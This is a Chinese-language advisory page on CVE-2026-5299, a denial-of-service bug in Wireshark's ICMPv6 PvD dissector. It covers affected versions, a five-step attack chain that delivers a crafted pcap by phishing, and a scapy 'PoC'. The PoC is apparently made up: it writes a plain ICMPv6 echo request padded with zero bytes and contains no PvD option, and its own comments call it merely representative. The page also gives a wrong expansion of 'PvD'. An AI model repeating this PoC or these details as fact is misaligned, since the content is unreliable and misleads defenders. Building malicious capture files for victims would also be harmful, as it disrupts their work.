CVE-2026-5299 CVSS 5.5 中危

CVE-2026-5299 Wireshark ICMPv6 PvD解析器拒绝服务漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5299

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wireshark

漏洞概述

Wireshark在4.6.0至4.6.4及4.4.0至4.4.14版本的ICMPv6 PvD协议解析器中存在安全漏洞。攻击者可诱导用户打开特制的捕获文件或捕获特定网络流量，触发解析器崩溃。该漏洞导致应用程序异常终止，造成拒绝服务，影响网络分析工作的可用性。

技术细节

该漏洞的根源在于Wireshark处理ICMPv6 PvD（Provider Prefix Discovery）协议数据时的逻辑缺陷。解析器在处理特定构造的协议字段或异常数据包长度时，未能进行充分的边界检查，导致内存访问越界或空指针解引用。攻击者通过构造畸形的网络数据包并保存为pcap格式，当受害者使用受影响版本的Wireshark打开该文件时，解析器在尝试解析PvD选项时会触发异常，从而导致软件崩溃。

攻击链分析

STEP 1

1. 侦察与准备

攻击者确认目标环境使用的是受影响版本的Wireshark（4.4.0-4.4.14或4.6.0-4.6.4）。

STEP 2

2. 构造恶意载荷

攻击者编写脚本，生成包含触发ICMPv6 PvD解析器崩溃的畸形字段的特制数据包，并将其保存为.pcap文件。

STEP 3

3. 投递载荷

攻击者通过钓鱼邮件或文件共享渠道，诱导受害者下载并打开该恶意的.pcap文件。

STEP 4

4. 触发漏洞

受害者使用Wireshark打开文件，协议解析器在解析ICMPv6 PvD数据时发生异常，导致程序崩溃。

STEP 5

5. 拒绝服务

Wireshark进程终止，造成分析工作中断，达成拒绝服务攻击目的。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

from scapy.all import *

# Define a crafted ICMPv6 packet with malformed PvD options
def generate_malformed_packet():
    # Construct basic IPv6 and ICMPv6 headers
    # Note: PvD is a specific option within ICMPv6. Here we simulate a malformed payload.
    pkt = IPv6(src="2001:db8::1", dst="2001:db8::2") / ICMPv6EchoRequest()
    
    # Add a raw payload that simulates a malformed PvD structure to trigger the crash
    # This is a representative payload as the exact trigger bytes are specific to the CVE.
    malformed_payload = b"\x00" * 100  # Example of buffer that might cause overflow
    
    pkt = pkt / Raw(load=malformed_payload)
    
    # Save to pcap
    wrpcap("cve_2026_5299_poc.pcap", [pkt])
    print("[+] PoC file generated: cve_2026_5299_poc.pcap")
    print("[+] Open this file with vulnerable Wireshark to reproduce the crash.")

if __name__ == "__main__":
    generate_malformed_packet()

影响范围

Wireshark 4.4.0 - 4.4.14

Wireshark 4.6.0 - 4.6.4

防御指南

临时缓解措施

如果无法立即升级，建议用户暂时禁用Wireshark中对ICMPv6 PvD协议的解析功能（通过“Analyze -> Enabled Protocols”中搜索并取消勾选），或者不要处理不可信的网络流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表